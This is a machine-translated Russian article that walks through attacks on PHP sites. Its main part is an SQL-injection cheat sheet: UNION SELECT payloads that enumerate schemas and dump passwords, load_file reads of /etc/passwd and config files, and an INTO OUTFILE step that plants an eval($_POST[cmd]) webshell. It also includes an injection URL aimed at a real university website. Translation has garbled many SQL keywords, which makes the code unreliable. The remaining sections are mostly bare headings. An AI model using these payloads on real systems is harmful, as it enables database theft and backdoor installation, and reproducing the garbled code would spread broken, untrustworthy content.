В этой статье кратко излагается несколько распространенных методов атаки PHP. Чтобы поделиться с вами для вашей справки, следующим образом:
1. SQL-инъекция
① . порядок по номерам/*
② . поле соответствия и объединение выберите 1,2,3,4,5 .n/*
③ . положение поля экспозиции и объединение выберите 1,2,3,4,5 ..N/*
④ . использование встроенной функции для предоставления информации о базе данных
версия() база данных() пользователь()
Нет необходимости угадывать доступные поля для раскрытия информации о базе данных (некоторые веб-сайты неприменимы).:
и объединить все выбранные версии()/*
и объединить все выбранные базы данных()/*
и объединить всех выбранных пользователей()/*
Информация об операционной системе:
и объедините все, выберите @@global.version_compile_os из mysql.user/*
Права доступа к базе данных:
И ord (mid (пользователь(),/* возвращает обычное описание как root
Моб (MySQL > 5.0)
Над MySQL 5 имеется встроенная библиотека information_schema, в которой хранится вся информация о структуре базы данных и таблиц MySQL. И объединение выберите 1,2,3, schema_name, 5,6,7,8,9,10 из information_schema. Ограничение схемы 0,1
Таблица для угадывания
И объединение выберите 1,2,3, имя таблицы, 5,6,7,8,9,10 из информационной схемы. Таблицы, в которых таблица ﹣ (ШЕСТНАДЦАТЕРИЧНОЕ) ограничение 0 (начальная запись, 0-первая начальная запись), 1 (показать 1 запись) –
Поле догадок
И объединение выберите 1,2,3, имя столбца, 5,6,7,8,9,10 в схеме информационного меню. Столбцы, в которых имя таблицы (ШЕСТНАДЦАТЕРИЧНОЕ) ограничено 0,1
Штормовой пароль
И объединение выберите 1,2,3, сегмент имени пользователя, 5,6,7, сегмент пароля, 8,9 из ограничения имени таблицы 0,1
Расширенное использование (одно доступное поле отображает два содержимого данных): объединение выберите 1,2,3 конкат (сегмент имени пользователя, 0x3c, сегмент пароля), 5,6,7,8,9 из ограничения имени таблицы 0,1
Белая лошадь напрямую (разрешение root)
Условия:
① , знать физический путь к сайту
② , имеют достаточные разрешения (вы можете использовать Select . из mysql. Пользовательский тест)
③ 、magic_quotes_gpc()=ВЫКЛ.
Выберите ‘< PHP Eval ($_post [CMD])? >’ в outfile ‘физический путь’ и объединить все выделенные шестнадцатеричные значения одного предложения в outfile ‘путь’
Загрузить файл() общий путь:
1、замените(load_file(0×2F6574632F706173737764),0×3c,0×20) 2、замените(load_file(символ(47,101,116,99,47,112,97,115,115,119,100)),символ(60),символ(32)) Два вышеуказанных параметра предназначены для проверки кода, полностью отображаемого в файле PHP. Иногда, если вы не замените некоторые символы, например, “заменить” < на “пробел”, будет возвращена веб-страница. Вы не можете просмотреть код 3. Файл загрузки (символ (47)) может содержать список корневого каталога системы FreeBSD, SunOS 4./etc TPD/conf tpd.conf или/usr/local/Apache/conf tpd.conf просмотр файла конфигурации виртуального хоста Linux Apache 5. C: \ program files \ Группа Apache \ Apache \ conf \ httpd.conf или C: \ Apache \ conf \ httpd.conf просмотр файла Apache в системе Windows 6. C:/resin-3.0.14/conf/resin.conf просмотр информации о конфигурации файла resin на веб-сайте, разработанной JSP 7. C:/resin/conf/resin.conf/usr/локальный/resin/conf/resin.conf просмотр виртуального хоста JSP, настроенного системой Linux 8、d:\APACHE\Apache2\conf\httpd.conf 9、C:\Program Файлы\mysql\my.ini 10../
Проблемы при ручном впрыске:
После инъекции на странице отобразится:
Незаконное сочетание параметров сортировки (latin1_swedish_ci,НЕЯВНО) и (utf8_general_ci,НЕЯВНО) для операции “ОБЪЕДИНЕНИЕ”
Такие как: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
Это связано с несогласованным кодированием,
Решение: добавьте перед параметром Unhex (шестнадцатеричный (параметр))
Просто отлично. Приведенный выше URL-адрес может быть изменен на:
Решение: добавьте перед параметром || Unhex (шестнадцатеричный (параметр)) || Просто отлично. Приведенный выше URL-адрес может быть изменен на:
Теперь мы можем продолжать вводить…
2. XSS (межсайтовый сценарий)
//www.jb51.net/article/160334.htm
3. Раскрытие исходного кода
Вы можете использовать php.ini или htaccess для управления
Order allow,deny Deny from all
4. Удаленное включение файлов
” if(file_exists(‘/home/wwwrun’ . $file . ‘.php’)){xxx} ?>
5. Захват сеанса
6. Подделка Межсайтового Запроса
7. Обход каталогов
Для получения дополнительной информации о PHP вы можете ознакомиться со следующими разделами: Учебник по безопасности программирования PHP, краткое описание навыков фильтрации безопасности PHP, краткое описание операций и использования операторов PHP, учебник по основному синтаксису PHP, учебник по объектно-ориентированному программированию PHP, краткое описание использования строк PHP, руководство по работе с базой данных PHP + MySQL 》И краткое описание общих навыков работы с базой данных PHP
Я надеюсь, что эта статья будет полезна для программирования на PHP.